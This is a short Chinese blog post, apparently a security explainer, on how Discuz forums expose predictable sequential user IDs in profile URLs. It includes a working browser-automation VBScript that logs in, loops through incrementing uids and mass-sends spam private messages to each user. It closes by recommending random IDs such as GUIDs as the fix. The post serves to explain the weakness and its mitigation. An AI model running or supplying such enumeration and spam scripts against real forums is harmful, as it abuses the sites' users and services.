关于信息泄漏的利用

WEB应用程序由于放在网络上,很容易被访问,一些安全信息也很容易暴露,例如用户数据、服务器信息等,这些泄漏的信息有些可以直接被使用,例如用户的帐号信息,有些可以被间接地利用,例如Discuz论坛对于用户资料的访问,由于用户ID是可预见的,例如:

http://bbs.XXX.com/space.php?action=viewpro&uid=10000

这里uid是可预见的,按注册顺序递增上去。

恶意用户可以利用这些信息,例如想群发信息给论坛用户,可以用类似如下的脚本:

SystemUtil.Run "iexplore" , "http://bbs.XXX.com/"

Browser("XXX").Navigate  "http://bbs.XXX.com/"

Browser("XXX").Page("XXX").Link("登录").Click
Browser("XXX").Page("XXX").WebEdit("username").Set "user1"
Browser("XXX").Page("XXX").WebEdit("password").Set "userpasswd"
Browser("XXX").Page("XXX").WebButton("登录").Click

uid = 10000
On Error Resume Next
For I = 0 to 10
 uid = uid + 1
 Browser("XXX").Navigate "http://bbs.XXX.com/space.php?action=viewpro&uid=" & uid
 Browser("XXX").Page("XXX").Link("发短消息").Click
 Browser("XXX").Page("XXX").WebEdit("message").Click
 Browser("XXX").Page("XXX").WebEdit("message").Set "垃圾信息!"
 Browser("XXX").Page("XXX").WebButton("发送").Click
 Wait 15
Next

Browser("XXX").Page("XXX").Link("退出").Click

SystemUtil.CloseProcessByName "iexplore"

如果Discuz论坛对于用户ID号的设计做一些更改,不使用可预见的ID(顺序注册),而是使用随机号(例如GUID),那么被利用的可能性就大大降低了。

你可能感兴趣的:(关于信息泄漏的利用)